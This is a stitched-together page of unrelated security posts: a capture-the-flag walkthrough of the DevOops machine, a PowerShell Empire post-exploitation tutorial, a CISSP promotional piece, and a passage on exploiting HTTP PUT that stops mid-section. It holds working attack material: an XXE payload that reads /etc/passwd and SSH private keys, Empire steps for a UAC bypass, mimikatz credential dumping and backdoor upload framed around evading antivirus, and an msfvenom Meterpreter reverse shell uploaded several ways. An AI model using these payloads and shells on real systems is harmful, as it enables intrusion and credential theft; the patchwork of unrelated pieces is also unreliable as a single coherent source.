05-14-2020, 09:53 AM
Level: Medium
Task: To find user.txt and root.txt file
Note: Since these labs are available online, the target has a static IP. The IP of DevOops is 10.10.10.91.
Table of Content
Scanning
- Open ports and Running services (Nmap)
- Web Directory spidering
- Upload XML file
- Intercept Browser request (Burp Suite)
- Access /etc/passwd file
- Steal SSH RSA key
- Capture user.txt flag
- Capture root.txt flag
Scanning
Let's start off with our basic Nmap command to find the open ports and services (-p- scans all 65535 TCP ports, -A adds version detection and default scripts, and --open prints only open ports).
nmap -p- -A 10.10.10.91 --open
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-_EbHbPEMpDY/W8NQmtTZcOI/AAAAAAAAasQ/hlNI2Ydq_5cvJllEZvWJqh-Wag-5iaqOwCEwYBhgL/s1600/1.png?w=687&ssl=1)
From the Nmap scan we learn that ports 22 (SSH) and 5000 are the only open ports on the target, so let's first navigate to port 5000 in a web browser (http://10.10.10.91:5000). The URL presents the web page shown in the image below.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-a7ZQ6jV_-tE/W8NQoG24D1I/AAAAAAAAaso/_fTrCrYfQCsKlOS3lRlWJMnittC494acwCEwYBhgL/s1600/2.png?w=687&ssl=1)
Enumeration
Since the home page gave us no remarkable clue, we turned to dirb for directory enumeration with the following command.
dirb http://10.10.10.91:5000
Hmm!! Here I received HTTP response 200 for /feed and /upload directories.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-k6HPOEvAbnE/W8NQoV-IDqI/AAAAAAAAass/kzsOcN9f5TQgvke9Wiwn4bAtldXCwC_0gCEwYBhgL/s1600/3.png?w=687&ssl=1)
So we browse to http://10.10.10.91:5000/upload and are welcomed by the web page shown below. It lets you upload an XML file containing the elements Author, Subject and Content. An upload that is parsed as XML is a candidate for XML External Entity (XXE) injection: if the server parses the file with external entities enabled, a SYSTEM entity declared in the DOCTYPE can pull a local file into the document. We therefore created the following XML, which declares an entity pointing at /etc/passwd and references it from Content, and saved it as 1.xml.
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<feed>
<Author>raj</Author>
<Subject>chandel</Subject>
<Content>&xxe;</Content>
</feed>
Then select the XML file we just created in the upload form and intercept the browser request with Burp Suite while uploading.
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-WYz0USVJ9EQ/W8NQodnsruI/AAAAAAAAasw/PD45FE4jyMMCCt2kNY156wvKhnzIcdtZQCEwYBhgL/s1600/4.png?w=687&ssl=1)
EXPLOIT XXE (XML External Entity)
Now send the intercepted request to Repeater.
The uploaded XML declares an entity that reads /etc/passwd, so we examine the server's response in Repeater to see whether the entity was expanded and echoed back.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-R5YVd1SWBqM/W8NQo1FMcyI/AAAAAAAAas0/FqHAKTyXlakA5JaD-5MnDIdpqyzh16cGwCEwYBhgL/s1600/5.png?w=687&ssl=1)
As you can observe in the image below, the XML works: the response contains the contents of /etc/passwd.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-5T6WZQMiNFA/W8NQpVMrV_I/AAAAAAAAas8/n0-Kv5m1ZokJgBq9bcQr8zBTH2gVVBjhwCEwYBhgL/s1600/6.png?w=687&ssl=1)
Similarly, we extract the user's SSH private key by pointing the entity at it instead (for example file:///home/roosa/.ssh/id_rsa, the default OpenSSH key location for the user roosa listed in /etc/passwd), as shown in the image below. Now copy the whole key and save it in a text file.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-3x1zdy1vgDM/W8NQpJRBZTI/AAAAAAAAas4/q0IryfUHPfwBFgDUgtuVmNGftKFGgejIgCEwYBhgL/s1600/7.png?w=687&ssl=1)
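The two requests above (one entity for /etc/passwd, one for the key) share a single mechanism, so here is an added example, not code from the write-up or from the DevOops box, that shows it end to end in Python's expat parser: `xxe_payload` builds a document in the shape of 1.xml, and `parse_feed` is run once as a server that resolves external entities (the vulnerable behaviour) and once as a hardened parser that refuses any DOCTYPE. The "passwd" file it reads is a constructed temp file, so nothing real is touched; the element and entity names come from 1.xml, everything else is the example's own.

```python
"""XXE mechanics: a resolving parser leaks the file, a DTD-rejecting parser refuses the upload.
Added example; not the write-up's or the target application's code."""
import os
import tempfile
import xml.parsers.expat as expat
from urllib.parse import urlparse


def xxe_payload(target_path, author="raj", subject="chandel"):
    """Build the same shape of document as 1.xml, pointing the entity at target_path."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        "<!ELEMENT foo ANY >\n"
        f'<!ENTITY xxe SYSTEM "file://{target_path}" >\n'
        "]>\n"
        f"<feed><Author>{author}</Author><Subject>{subject}</Subject>"
        "<Content>&xxe;</Content></feed>\n"
    ).encode()


class DTDForbidden(ValueError):
    """Raised by the hardened parser as soon as a DOCTYPE appears."""


def parse_feed(data, resolve_external):
    """Return {element name: text}. resolve_external=True emulates the vulnerable
    server (it reads whatever file:// URL the entity names); False rejects any DTD."""
    parser = expat.ParserCreate()
    fields = {}
    current = [None]  # name of the element whose text is being collected

    def start(name, _attrs):
        current[0] = name
        fields.setdefault(name, "")

    def chars(text):
        if current[0] is not None:
            fields[current[0]] += text

    def end(_name):
        current[0] = None

    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end

    if resolve_external:
        # Vulnerable behaviour: read the file and parse its bytes as the entity's
        # replacement text, so they land inside <Content> (the child parser
        # inherits the handlers above).
        def fetch(context, _base, system_id, _public_id):
            with open(urlparse(system_id).path, "rb") as fh:
                body = fh.read()
            child = parser.ExternalEntityParserCreate(context)
            child.Parse(body, True)
            return 1  # tell expat the reference was handled

        parser.ExternalEntityRefHandler = fetch
    else:
        # Hardened behaviour: a feed upload never needs a DTD, so refuse it outright.
        def forbid(doctype_name, _system_id, _public_id, _has_internal_subset):
            raise DTDForbidden(f"DOCTYPE {doctype_name!r} is not allowed in uploads")

        parser.StartDoctypeDeclHandler = forbid

    parser.Parse(data, True)
    return fields


def demo():
    """Run both parsers over a payload aimed at a constructed passwd-style temp file.
    Returns (text leaked by the vulnerable parser, True if the hardened parser refused)."""
    with tempfile.NamedTemporaryFile("w", suffix=".passwd", delete=False) as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n"
                 "roosa:x:1000:1000::/home/roosa:/bin/bash\n")  # constructed sample
        fake_passwd = fh.name
    try:
        payload = xxe_payload(fake_passwd)
        leaked = parse_feed(payload, resolve_external=True)["Content"]
        try:
            parse_feed(payload, resolve_external=False)
            blocked = False
        except DTDForbidden:
            blocked = True
    finally:
        os.unlink(fake_passwd)
    return leaked, blocked


if __name__ == "__main__":
    leaked_text, was_blocked = demo()
    print("vulnerable parser returned:\n" + leaked_text)
    print("hardened parser blocked the upload:", was_blocked)
```

The hardened branch rejects at the DOCTYPE rather than trying to filter entity names: an upload form has no legitimate use for a DTD, and a blanket refusal also stops parameter-entity and billion-laughs variants that an entity blocklist would miss.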
Access Victim’s Shell
Since we have saved the RSA private key in a text file named "key", set its permissions to 600 (ssh refuses to use a key that is readable by other users) and log in with the following commands.
chmod 600 key
ssh -i key roosa@10.10.10.91
Boom!! We have a shell on the target machine; let's go for the user.txt file.
cd /home
ls
cd roosa
ls
cat user.txt
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-6KIBvMjjmPY/W8NQpX-Rv-I/AAAAAAAAatA/eaXqfr3PoNgQy_3Kya3Yptrxved6QrpWwCEwYBhgL/s1600/9.png?w=687&ssl=1)
Privilege Escalation
Great!!! The first task is done, but to obtain root.txt we need to escalate our privileges to root, so we traversed many directories and files looking for the next clue.
cd work
ls
cd blogfeed/
ls
cat run-gunicorn.sh
cd resources
ls
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-xb6hULfCa1w/W8NQm7nu6NI/AAAAAAAAasU/WMZd4FPnaBUeECaJyddUuAfxxO8h6CcBACEwYBhgL/s1600/10.png?w=687&ssl=1)
Here we found a .git directory, so let's inspect the repository history with the following command.
git log
The log lists many commits, as shown in the following image, and their messages suggest that an SSH key was committed to the repository, possibly one usable for root login.
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-1sR7PgKM5zk/W8NQnHBa7FI/AAAAAAAAasY/svfDJEmurr480GD9LX5OvRQfnyKf8WvJgCEwYBhgL/s1600/12.png?w=687&ssl=1)
So we inspected the likely commits with git show <commit> to see what each one changed. The first RSA private key we obtained this way did not work.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-cqmvBD1o5bY/W8NQnVJ8trI/AAAAAAAAasc/2n0V0KHh5q47slJw7Z_sON_bIqbSqncpgCEwYBhgL/s1600/13.png?w=687&ssl=1)
Finally we found the original RSA key, highlighted in red in the image below. It is the version that a later commit removed, so git show prints each of its lines with a leading "-" diff marker. Copy the red text into a file, strip the leading "-" from every line, and make sure the file ends with a proper -----END RSA PRIVATE KEY----- line.
![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-hODff1MuoAs/W8NQn1TKgLI/AAAAAAAAask/YlHcDSIBpRcZPcRMYiIkb5jpaN5sdcQjwCEwYBhgL/s1600/14.png?w=687&ssl=1)
Since we have copied the RSA private key into a text file named "rootkey", set its permissions to 600 and log in with the following commands.
chmod 600 rootkey
ssh -i rootkey root@10.10.10.91
ls
cat root.txt
Congrats!! We have found root.txt; the image below shows its value.
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-In-acK-Hc20/W8NQn7td6-I/AAAAAAAAasg/8DW5SfFsaVEbaOp6UA3tKSHbFOhRK7FYgCEwYBhgL/s1600/15.png?w=687&ssl=1)
Today's article is the first post of our Empire series. In it we cover the basics you need to know about the PowerShell Empire framework; later posts will look at Empire's more advanced capabilities.
Table of Content:
- Introduction
- Installation
- Importance
- Terminology
- Demo
- Conclusion
Empire is a post-exploitation framework. Its original agent is written in pure PowerShell, and the framework provides cryptographically secure agent communications on top of a flexible architecture. Empire can run PowerShell agents without needing powershell.exe, rapidly deploy post-exploitation modules ranging from keyloggers to Mimikatz, and adapt its communications to evade network detection. Since version 2.0 the framework merges the PowerShell Empire and Python EmPyre projects, which makes it convenient to use against both Windows and Linux/macOS targets; PowerShell Empire came out in 2015 and EmPyre in 2016. It is comparable to Metasploit and Meterpreter, but as a command and control (C2) tool it is built around managing many compromised machines efficiently.
Importance
PowerShell gives an attacker abundant offensive advantages: full access to .NET, direct access to the Win32 API, and the ability to build malicious binaries in memory, which sidesteps application whitelisting such as AppLocker when it only governs executables on disk. Empire provides C2 functionality, lets you deliver a second stage after the initial foothold, and can be used for lateral movement. New modules are quick to develop compared to other frameworks. And because it does not require powershell.exe, it is often able to evade antivirus products. Hence, it is best to use the PowerShell Empire.
Terminology
Before starting with the action you need to know these four things:
- Listener: the listener is a process which listens for a connection from the machine we are attacking. This helps Empire send the loot back to the attacker’s computer.
- Stager: A stager is a snippet of code that allows our malicious code to be run via the agent on the compromised host.
- Agent: An agent is a program that maintains a connection between your computer and the compromised host.
- Module: These are what execute our malicious commands, which can harvest credentials and escalate our privileges as mentioned above.
You can download Empire from its GitHub repository (or simply search for it on Google). Clone it with the following command. Note that the EmpireProject repository has since been archived; the actively maintained fork is published by BC-SECURITY.
git clone https://github.com/EmpireProject/Empire.git
![[Image: 1.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-kb0xPUsnfqo/XFLz_o6Mf7I/AAAAAAAAcf0/wdOcxDFNTlIElEv-QJI9J9LWnXARnb9rgCLcBGAs/s1600/1.png?w=687)
Once the download completes, follow the steps below to install it:
cd Empire/
ls
cd setup/
ls
./install.sh
![[Image: 2.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-3kXsXeA4pC8/XFL0CS3XqiI/AAAAAAAAcgU/1pEeZTVaN4gO8KiPUw6NsR5KeLr1MCxkgCLcBGAs/s1600/2.png?w=687)
Wait for the installation to complete; it may take a while. It will prompt you for a password, which becomes the Empire server password.
In my case, my password was toor.
Once the installation is done, move back a directory and run Empire with ./empire.
Now use the help command, which lists all the essential options you need initially.
![[Image: 3.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-d8ni0QUi_m0/XFL0CclGrfI/AAAAAAAAcgc/s3WcR_3bBPobGFiJ--Dsf11dDpdf3focQCLcBGAs/s1600/3.png?w=687)
According to the workflow, we first create a listener on our local machine. Type the following command:
listeners
After running the above command it says "no listeners are currently active", but don't worry: we are now in the listener interface. In this interface, type:
uselistener <tab> <tab>
![[Image: 4.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-_fTeY3Ywa-4/XFL0CYWLlsI/AAAAAAAAcgY/GgKrmDIlZUYxLqWbVZ4vDNvcnXHRl7vpgCLcBGAs/s1600/4.png?w=687)
The above command lists all the listeners one can use, such as dbx, http, http_com, etc. The most popular and commonly used listener is http, and we will use it here. For that type:
uselistener http
This command creates an HTTP listener that defaults to local port 80. If port 80 is already in use by a service such as Apache, either stop that service or change the listener's port with set Port <port>. To see all the settings this listener offers, type:
info
As you can see in the image, there are a variety of settings to modify or customize your listener. Let's change the name of our listener, as it helps keep track of listeners when several are active. For this, type:
set Name test
The above command changes the listener's name from http to test.
Usually the listener picks up the local host IP automatically but, just in case, you can set it explicitly and then start the listener:
set Host http://192.168.1.107
execute
The above command starts the listener. Then go back to the main menu; the running listener is shown in the image.
![[Image: 5.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-s4kEOLyRGRU/XFL0DIGP-cI/AAAAAAAAcgg/4GCAfOrW6YwzCrPTCm10ZDBOzG5ii5UCACLcBGAs/s1600/5.png?w=687)
Now type back to leave the listener interface so we can generate a stager. Use the following command to list all the stagers Empire provides:
usestager <tab> <tab>
As you can see in the image below, there are many stagers for both Windows and macOS (osx), along with some multi-platform ones. We will use windows/launcher_bat to create the payload that compromises the victim's PC in our tutorial. For that type:
usestager windows/launcher_bat
Then type info again to see all the settings the stager requires. On inspection, only the listener needs to be provided. Therefore, type:
set Listener test
execute
![[Image: 6.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-8GC5G1v_KNU/XFL0Df6RNzI/AAAAAAAAcgo/l6aeNEIhzDIj2BQ0D0zOropqkZaU2kdeACLcBGAs/s1600/6.png?w=687)
![[Image: 7.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-4Qz2ZCt3UYg/XFL0DUztQFI/AAAAAAAAcgk/k4Ia1WzLBHAQ0-fw0PhR1IVSlnIKz6nQgCLcBGAs/s1600/7.png?w=687)
The above two commands set the listener to test and generate /tmp/launcher.bat. Serve this file to the victim's PC (for example with Python's built-in HTTP server, python -m http.server, run in the directory holding the file) and execute it there. As soon as it runs, you get a session. To check your sessions type:
agents
With the above command you can see that a session is active. You can rename the session, as the default name is random and hard to remember. To do so type:
rename ZAF3GT5W raajpc
Use the following to access the session:
interact raajpc
Once you have access to the session, try to obtain an elevated (high-integrity) session with the following command; the argument is the name of the listener the new agent should call back to (test here, or whatever name your listener has):
bypassuac test
After the bypassuac command runs, another agent checks in. Rename that session too by typing:
rename HE3K45LN adminraj
![[Image: 8.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-VrhR5HZlCfc/XHFl-fEMcWI/AAAAAAAAc9w/i5fFxcowU6kMMA9zM_nlccTkmifEnWObwCLcBGAs/s1600/8.png?w=687)
Let's interact with adminraj now.
interact adminraj
Pressing <tab><tab> shows all the options available in the agent shell. Several of them are useful for post-exploitation, such as info, jobs, list, etc., as shown in the image.
Info: shows the agent's basic details like IP, nonce, jitter, integrity, etc.
![[Image: 9.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-O0t-lLeLWGA/XFL0D1HiqJI/AAAAAAAAcgw/dFt5zhcL8nYj6NwZuLDQXSey8zdK_vLLgCLcBGAs/s1600/9.png?w=687)
Now if you use ‘help’ command, you will be able to see all the executable commands.
![[Image: 10.1.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-xUQKlVc2ZLI/XFLz_hohXrI/AAAAAAAAcfs/u0J0YZMzJ3EKltz1KqhNzoXxYQbIHZ8HwCLcBGAs/s1600/10.1.png?w=687)
Let's try running mimikatz to get the user's password. Mimikatz reads credentials out of the LSASS process, so it only works from a high-integrity (admin) agent and not from a normal user shell; this is why we needed the UAC bypass first.
Hmmmm!! And the password is "123" for user raj.
![[Image: 10.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-zRAujpU5H3k/XFLz_tAf41I/AAAAAAAAcfw/Z7cM7LKX08Uwj1nQ2hUQa2tcaUYyrOzywCLcBGAs/s1600/10.png?w=687)
creds
The above command lists the credentials Empire has harvested from any user, both plaintext passwords and hashes.
Another important command is shell. It runs a command in the victim's Windows command interpreter, so native Windows commands can be used from the agent.
For example, one such cmd-only command is netstat:
shell netstat -ano
As expected, the above command showed us all the ports currently in use on the machine!
![[Image: 11.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-mMorvsHGp8U/XFL0AA7UCxI/AAAAAAAAcf4/mTPLM73UgqkL3nDzC0CZOXKLGcuGuBaHwCLcBGAs/s1600/11.png?w=687)
The agent's working directory starts out as C:\Windows\System32, so let's move to another directory, download a file from there, and also upload something to that location, for example a backdoor. Use the following commands:
shell cd C:\Users\raj\Desktop
shell dir
download 6.png
The above command downloads an image called 6.png from the victim's desktop into Empire's downloads directory.
upload /root/Desktop/revshell.php
With the above command we upload a PHP backdoor from Kali's desktop to the victim's desktop; any backdoor could be uploaded this way, and since we have shell access we could launch it from there as well.
![[Image: 12.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-X1s-YWC1Xj4/XFL0Ad6DoAI/AAAAAAAAcgA/Avx78M4YfiAXWq3h0n3ZdxK-OMZMqzPtQCLcBGAs/s1600/12.png?w=687)
Downloaded files are stored under:
Empire directory/downloads/<agent name>/<path on the agent>
![[Image: 13.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-xcgY1gDBusQ/XFL0AVt1kQI/AAAAAAAAcf8/ypsDs9J7nPUFNPP6ZdL6NalmMyzPcfN-QCLcBGAs/s1600/13.png?w=687)
shell dir
The above command confirms that revshell.php was indeed uploaded: there it is on the victim's desktop, our backdoor file.
![[Image: 14.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-7AWWXjwfZDk/XFL0A4BNkcI/AAAAAAAAcgE/qhQR92UguCchbz1rgR486FutoET9lJZqwCLcBGAs/s1600/14.png?w=687)
That was the basic demo of Empire, its terminology and how to use it. There is one more term, usemodule. Lastly, let's see how to use it.
usemodule <tab> <tab>
The command will show you all the modules available and ready to use as shown in the image below:
![[Image: 15.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-aOtqoWHNG8s/XFL0BTFzhdI/AAAAAAAAcgI/S-WzclFtJucehgAvb1hlmtbzqC_n0itUACLcBGAs/s1600/15.png?w=687)
Following is a small demo of how to use usemodule. Type:
usemodule trollsploit/message
set MsgText you have been hacked
execute
y
![[Image: 16.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-6IbGGv3fPhs/XFL0BjvFu3I/AAAAAAAAcgM/S4fj_0ifqQA_Z6lDyXhWWMcK4gTCOiQaACLcBGAs/s1600/16.png?w=687)
Running the above module displays a message box on the victim's PC, as shown in the image below:
![[Image: 17.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/--t6ETMHrT1c/XFL0B4_4W1I/AAAAAAAAcgQ/C6zgUrEZyW8T8hp1HO_HopvLfOoi_SSAACLcBGAs/s1600/17.png?w=687)
Conclusion
Payloads in the form of .exe/.dll/.hta etc. let an attacker construct almost any desired attack, since the framework has access to Win32. Although antivirus vendors are catching up day by day, these techniques are still effective. Empire is a great tool thanks to its vast, mature and efficient collection of post-exploitation modules. Ultimately the goal is to remain undetected and succeed in your attack, and this tool helps you do so. This article covered all the basics you need to know about the framework.
Happy Hacking!!
Every business organization seeks the safety and security of its internal information. It is essential to ensure that data is protected from malicious attackers who breach networks through unfair practices. Maintaining a sound information security policy and hiring the right set of qualified professionals is of prime importance to any organization that intends to prevent its internal servers and systems from being compromised. Such professionals ensure that software installations are up to date and build in security layers that make it difficult for cyber attackers to intrude into the network.
What is CISSP?
CISSP stands for Certified Information Systems Security Professional. The certification is conferred by the International Information Systems Security Certification Consortium, (ISC)², a global non-profit organization specializing in IT security. (ISC)² is regarded as one of the world's largest information security organizations and offers a variety of security certifications such as CISSP, CSSLP and CAP.
As an information security aspirant, there are multiple benefits of obtaining a CISSP certification that you simply cannot ignore. Let's discuss some of the top reasons to earn the certification and see why a CISSP is valued by business organizations and acts as a key component in the selection process for managerial-level information security positions.
- Global Recognition
Obtaining a CISSP certification is a good move for a flourishing IT career: it provides industry-wide recognition and was named "Best Professional Certification Program" by SC Magazine. The certification is endorsed and recognized by well-known global companies such as Google and IBM. It is ascertained that there is a projected requirement of about 56% more cyber security experts in the current job market.
- (ISC)² Membership
- Job Competency
The certification demonstrates competency in areas such as software development and enterprise computing solutions in production and operating environments.
- Increased Earning Potential
- High Demand for Security Experts
Takeaway
Considering all the factors discussed in this article, we can safely say that obtaining a CISSP certification can propel your IT career considerably. CISSP is thus a very well-performing certification, and once you are through it, it offers a rewarding, lucrative and satisfying career path in the long run.
Author Bio: I am Maria Thomas, Content Marketing Manager and Product Specialist, with eight years of rich experience in professional certification courses like PMI Project Management Professional, PMI-ACP, Prince2, ITIL (Information Technology Infrastructure Library), Big Data, Cloud and Six Sigma.

Hi Friends, today's article is about exploiting the HTTP PUT method through various techniques. First we determine whether the HTTP PUT method is enabled on the target machine, after which we use several different methods to upload a Meterpreter reverse shell to the target and compromise it.
Table of Content
- Introduction to HTTP PUT Method
- Scanning HTTP PUT Method (Nikto)
- Exploiting PUT Method Using Cadaver
- Exploiting PUT Method Using Nmap
- Exploiting PUT Method Using Poster
- Exploiting PUT Method Using Metasploit
- Exploiting PUT Method Using Burpsuite
- Exploiting PUT Method Using Curl
The PUT method was originally intended as one of the HTTP methods for file management operations: it asks the server to store the request body at the request URI. If HTTP PUT is enabled on a web server, it can be used to upload a malicious resource such as a web shell to the target and then execute it.
Because PUT (and DELETE) change or remove files on the server's file system, leaving them enabled often leads to file upload vulnerabilities and, from there, to critical attacks. As a best practice, these methods should be disabled unless the organization absolutely MUST have them, and where they are required, write access should be strictly limited to authenticated, authorized users.
Note: In this tutorial, we are using a Vulnerable target machine for Pentesting purposes and to illustrate the use of various tools. This is purely meant for educational purposes in the testing environment and should not be used in a Production environment without the authorized permissions from the relevant authorities/management.
Requirements
Target: Metasploitable 2
Attacker: Kali Linux machine
Let’s Begin!!!!
Boot your Kali Linux machine (IP: 192.168.1.105) and, in parallel, open the victim IP 192.168.1.103 in Firefox and click WebDAV. As the screenshot shows, it lists only the parent directory.
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-IAvnCT5J0D0/W77ri1o1mRI/AAAAAAAAaq0/r9dKhua-6iwzivv_6hHEIHMCueQuLH1kwCEwYBhgL/s1600/1.png?w=687&ssl=1)
First, we need to confirm that the target allows the HTTP PUT method, which would let us upload a malicious backdoor. To confirm this we scan the target with Nikto.
Nikto is a popular web server scanner that tests web servers for dangerous files/CGIs, outdated server software and other issues. It also performs generic and server-type-specific checks. Below is the command to scan the URL:
nikto -h http://192.168.1.103
When the scan finishes, the highlighted part of the screenshot below shows that the HTTP PUT method is allowed (Nikto sends an OPTIONS request and reports the methods listed in the server's Allow header). Now let's compromise the target by uploading a malicious PHP file, using the various techniques in the following sections.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-_fKRSGfCCgA/W77rlIJD1XI/AAAAAAAAaqo/SA6dYhM9WtUVv3H6ryRskxjAktX8OgzmQCEwYBhgL/s1600/2.png?w=687&ssl=1)
Prepare the malicious file to be uploaded with msfvenom:
msfvenom can generate a PHP Meterpreter payload that gives us a reverse shell. Run the following command:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.105 lport=4444 -f raw
Copy the output from <?php through die() and save it as shell.php on the desktop. It will be uploaded to the web server in the sections that follow.
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-ai6_PuZKAtU/W77rl0U7yzI/AAAAAAAAaq0/_yom0zpAx4ID2rNrdTJvQvzx8WSLEKXBQCEwYBhgL/s1600/3.png?w=687&ssl=1)
In parallel, load the Metasploit Framework by typing msfconsole in a new terminal and start multi/handler. This will be used later in the section.
Cadaver
Cadaver is a command-line WebDAV client pre-installed on Kali that can upload files to and download files from a WebDAV share.
Connect to the target's WebDAV URL with the command below.
cadaver http://192.168.1.103/dav/
Once connected to the target directory, upload shell.php from the desktop with the following command:
put /root/Desktop/shell.php
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-orYWQsnvyQQ/W77rmHlDItI/AAAAAAAAaqI/PDRguU1qCtIyIFqsEWCcjV6Rh8dRAYQhQCEwYBhgL/s1600/4.png?w=687&ssl=1)
To verify the upload, open http://192.168.1.103/dav/ in the browser. Awesome!!! As we can see, the malicious file shell.php is now on the web server.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-yG32I2RGUeY/W77rmDmgKSI/AAAAAAAAaqs/Ss7Yu3qYMSgwizHtwTE6I0Z5x7pS0zL3wCEwYBhgL/s1600/5.png?w=687&ssl=1)
Now, in the Metasploit console, start a handler with the exploit/multi/handler module. Set the payload to match the one msfvenom generated, and set LHOST and LPORT to the Kali machine's IP and the port to listen on. Then run exploit to start listening for incoming connections.
msf> use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.105
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
Press Enter and we see that the reverse TCP handler has started on 192.168.1.105:4444.
Now go back to the uploaded shell.php file and click it. When it runs, the reverse TCP connection arrives at our handler and we get a Meterpreter session. Run sysinfo in the session to get the OS and architecture details:
meterpreter > sysinfo
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-TvOtpJaXils/W77rmVp2B8I/AAAAAAAAaqw/H2g5L6Yr4CkURrBMgEWMxQX9I3gRuqrpwCEwYBhgL/s1600/6.png?w=687&ssl=1)
Nmap
Nmap is an open-source port scanner and network exploration tool. If PUT is enabled on a web server, Nmap's http-put NSE script can upload a file for us. The local file and the remote URL path are passed as script arguments; prepare the malicious file nmap.php (the same msfvenom payload saved under another name) beforehand.
nmap -p 80 192.168.1.103 --script http-put --script-args http-put.url='/dav/nmap.php',http-put.file='/root/Desktop/nmap.php'
As seen from the below screenshot, the nmap.php file has been uploaded successfully.
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-els_LacO3vo/W77rm2psBgI/AAAAAAAAaqw/BrGv-I3DGBojQptXytnaLc3tYfS48w3rgCEwYBhgL/s1600/7.png?w=687&ssl=1)
Open http://192.168.1.103/dav in the browser: as the screenshot shows, nmap.php is now on the web server.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-LTOaoA34ITg/W77rnfaZ41I/AAAAAAAAaq0/09RjXZx37zUjv2wG6Mghh6LqTdweKZY9wCEwYBhgL/s1600/8.png?w=687&ssl=1)
Meanwhile, start multi/handler in msfconsole as before, then open the uploaded nmap.php in the browser. As shown below, this gives us a Meterpreter session.
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-KR1ALvq0nvc/W77rnECSIPI/AAAAAAAAaqY/jgYOrjezrww8MBqQRyIdNYM_T-cxoS5XQCEwYBhgL/s1600/9.png?w=687&ssl=1)
Poster
Poster is a Firefox add-on, a developer tool for interacting with web services, that lets the user send HTTP requests with methods such as GET, POST, PUT and DELETE and set the entity body and content type.
Prepare the malicious file poster.php that you want to upload to the target. Install the Poster add-on in Firefox, click Tools in the menu bar and choose Poster from the drop-down menu. The following dialog opens. Type the URL as shown in the screenshot, provide the path to the malicious file via the Browse option, and finally click the PUT action.
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-3184VfcbqFs/W77rjJrkjuI/AAAAAAAAaqg/UHEV0USTGnsw1IFAwPPjWQX4lFAyFeJSQCEwYBhgL/s1600/10.png?w=687&ssl=1)
Open http://192.168.1.103/dav in the browser: as the screenshot shows, poster.php is now on the web server.
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-C-tuuFu7ezs/W77rjMRoNNI/AAAAAAAAaq0/C0FT-zPRUnAt_u7EkhWgkoMu2NmkK1ovwCEwYBhgL/s1600/11.png?w=687&ssl=1)
Meanwhile, start multi/handler in msfconsole as before, then open the uploaded poster.php in the browser. This gives us a Meterpreter session.
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-4VC6GAbwlk0/W77rjuzWlWI/AAAAAAAAaqk/2j4EUs3OEbs93k9oKaRFP0JjvvPrXUUngCEwYBhgL/s1600/12.png?w=687&ssl=1)
Burpsuite
Burp Suite is one of the most popular intercepting proxies; its graphical interface lets you analyze and modify requests of every kind, including GET and POST.
Configure the browser's manual proxy settings so that Burp can intercept the request, then enter the URL http://192.168.1.103/dav/ but don't hit ENTER yet. In parallel, go to Burp's Proxy tab and turn Intercept on under the Intercept sub-tab. As soon as we hit ENTER in the browser, the request appears in the intercept window. Right-click the request and, from the options displayed, choose Send to Repeater.
